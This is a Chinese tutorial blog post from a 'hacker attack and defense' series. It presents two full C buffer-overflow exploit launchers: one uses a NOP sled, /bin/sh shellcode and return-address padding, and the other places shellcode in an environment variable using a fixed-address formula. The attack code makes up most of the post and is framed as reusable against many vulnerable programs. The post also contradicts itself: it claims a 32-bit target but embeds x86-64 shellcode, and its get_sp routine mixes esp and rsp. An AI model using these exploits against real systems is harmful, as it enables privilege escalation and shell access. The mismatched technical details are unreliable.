黑客攻防入門(五)通用的緩沖區(qū)漏洞攻擊代碼

一、 緩沖區(qū)足夠大的情形

下面的代碼是網(wǎng)上眾多緩沖區(qū)溢出攻擊代碼的一個變種,它可以進(jìn)行很多場合下的漏洞攻擊。

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

char shellcode[] =  /* shellcode exec /bin/sh */
    "\xeb\x2b\x59\x55\x48\x89\xe5\x48"
    "\x83\xec\x20\x48\x89\x4d\xf0\x48"
    "\xc7\x45\xf8\x00\x00\x00\x00\xba"
    "\x00\x00\x00\x00\x48\x8d\x75\xf0"
    "\x48\x8b\x7d\xf0\x48\xc7\xc0\x3b"
    "\x00\x00\x00\x0f\x05\xe8\xd0\xff"
    "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long get_sp(void) {
    __asm__("movl %esp, %eax"); /* return rsp */
}

int main(int argc, char *argv[])
{
    int i, offset = 0;
    unsigned long sp, ret, *addr_ptr;
    char *prg, *prgpath, *buffer, *ptr;
    int size = 500;  /* default buffer size */

    sp = get_sp();  /* local sp value */

    if(argc > 1)
        prg = argv[1]; /* app name be exploited */

if(argc > 2)
        prgpath = argv[2]; /* app path be exploited */

    if(argc > 3)
        size = atoi(argv[3]);

    if(argc > 4)
        offset = atoi(argv[4]);

    if(argc > 5)
        sp = strtoul(argv[5], NULL, 0);  /* input sp for remote exploits */

    ret = sp - offset;

    buffer = (char *)malloc(size);

    ptr = buffer;

    addr_ptr = (unsigned long *) ptr;

    /* fill entire buffer with return addresses, ensures proper alignment */
    for(i=0; i < size; i+=4) {
        *(addr_ptr++) = ret;
    }

    /* fill 1st half of exploit buffer with NOPs */
    for(i=0; i < size/2; i++) {
        buffer[i] = '\x90';
    }

    /* place shellcode. start at the middle of the buffer */
    ptr = buffer + size/2;
    for(i=0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }

    buffer[size-1] = '\0';

    execl(prgpath, prg, buffer, (char*) 0);

    free(buffer);

    return 0;
}

上面這段代碼主要作用是取代手工注入,代碼運(yùn)行基于32位的linux系統(tǒng),buffer size預(yù)設(shè)為500字節(jié),建設(shè)緩沖區(qū)不要少于500byte, 如果太小了就會裝不下shellcode。

代碼的參數(shù)1是將要攻擊的程序的路徑,參數(shù)2是將要攻擊的程序的程序名稱,參數(shù)3是緩沖區(qū)大小,參數(shù)4是調(diào)整地址對齊的偏移地址,參數(shù)5用于手工輸入esp(這是緩沖區(qū)存儲的地址范圍)。

這段代碼的注入模式是:NOPs+Shellcode+addr。

先用NOPs填充緩沖區(qū)開頭的一半空間,這樣更方便控制EIP(cpu指令指針),即使addr是一個大概的地址,也能成功的通過NOPs滑動至達(dá)shellcode的地址。

后面用addr填充就是確保能夠覆蓋保存的返回地址, 其中地址的對齊方式是4字節(jié),可以通過程序的argv參數(shù)去控制offset偏移,精準(zhǔn)的覆蓋返回地址的前題是要正確對齊地址。

二、 緩沖區(qū)很小的情況

如果緩沖區(qū)只有10來個字節(jié),不夠安放shecode時,可以用環(huán)境變量的方法用存放shellcode,下面的代碼用來實(shí)施小緩沖區(qū)漏洞攻擊。

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define SIZE 128

char shellcode[] =  /* shellcode exec /bin/sh */
    "\xeb\x2b\x59\x55\x48\x89\xe5\x48"
    "\x83\xec\x20\x48\x89\x4d\xf0\x48"
    "\xc7\x45\xf8\x00\x00\x00\x00\xba"
    "\x00\x00\x00\x00\x48\x8d\x75\xf0"
    "\x48\x8b\x7d\xf0\x48\xc7\xc0\x3b"
    "\x00\x00\x00\x0f\x05\xe8\xd0\xff"
    "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";


int main(int argc, char *argv[])
{
    char *prg, *prgpath, p[SIZE];
    int *ptr, i, addr, offset = 0;

    char *env[] = {shellcode, NULL};

    if(argc > 1)
        prg = argv[1]; /* app name be exploited */

    if(argc > 2)
        prgpath = argv[2]; /* app path be exploited */

    if(argc > 3)
        offset = atoi(argv[3]); /* app path be exploited */

    addr = 0xbffffffa - strlen(shellcode) - strlen(prg); /* calculate the exact location of the shellcode*/

    ptr = (int *) (p + offset); /*fill buffer with computed address, start offset bytes into array for stack alignment*/

    for(i = 0; i < SIZE; i+=4) {
        *ptr++ = addr;
    }

    execle(prgpath, prg, p, NULL, env);

    exit(1);
}

上面的代碼涉及一個地址計算公式,這個公式是由Murat Balaban發(fā)現(xiàn)的, 這依賴于以下事實(shí):即所有Linux ELF文件在映射到內(nèi)存中時會將最后的相對地址設(shè)為0xbfffffff。參考linux程序運(yùn)行內(nèi)存布局可知,環(huán)境變量和參數(shù)就是存儲在這個區(qū)域的。

這個公式是:

shellcode = 0xbfffffff - 0x4 - length(program name) - length(shellcode)

以下是示意圖,基于linux的32位系統(tǒng):

示意圖

參考文章:

  1. Gray Hat Hacking, The Ethical Hacker's Handbook
  2. Computer Systems
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 緩沖區(qū)溢出(Buffer Overflow)是計算機(jī)安全領(lǐng)域內(nèi)既經(jīng)典而又古老的話題。隨著計算機(jī)系統(tǒng)安全性的加強(qiáng),傳...
    Chivalrous閱讀 1,395評論 0 5
  • 1. 概說 緩沖區(qū)溢出又叫堆棧溢出(還有許許多的稱呼),這是計算機(jī)程序難以避免的漏洞,除非有新的設(shè)計方式將程序運(yùn)行...
    讀書郞閱讀 5,878評論 4 27
  • 概說 現(xiàn)代的編譯器和系統(tǒng)已經(jīng)實(shí)現(xiàn)了很多機(jī)制,避免受到緩沖區(qū)溢出的攻擊,下面介紹Linux上比較新版本的GCC所提供...
    讀書郞閱讀 2,410評論 0 1
  • “幸福的種子,也只是一粒種子”,寫下傷感的這一句話、松開握緊種子的那只手。 這是一本有關(guān)兒童閱讀的書,除了上次我寫...
    樂讀書房_李葵閱讀 611評論 1 5
  • 你想現(xiàn)在感受到天國里的生活嗎?若想就開始想你回到了家,你認(rèn)了錯,神開始親你,喜歡你!給你擁抱,給你平安,為你殺了牛...
    洪恩臨到閱讀 166評論 0 0

友情鏈接更多精彩內(nèi)容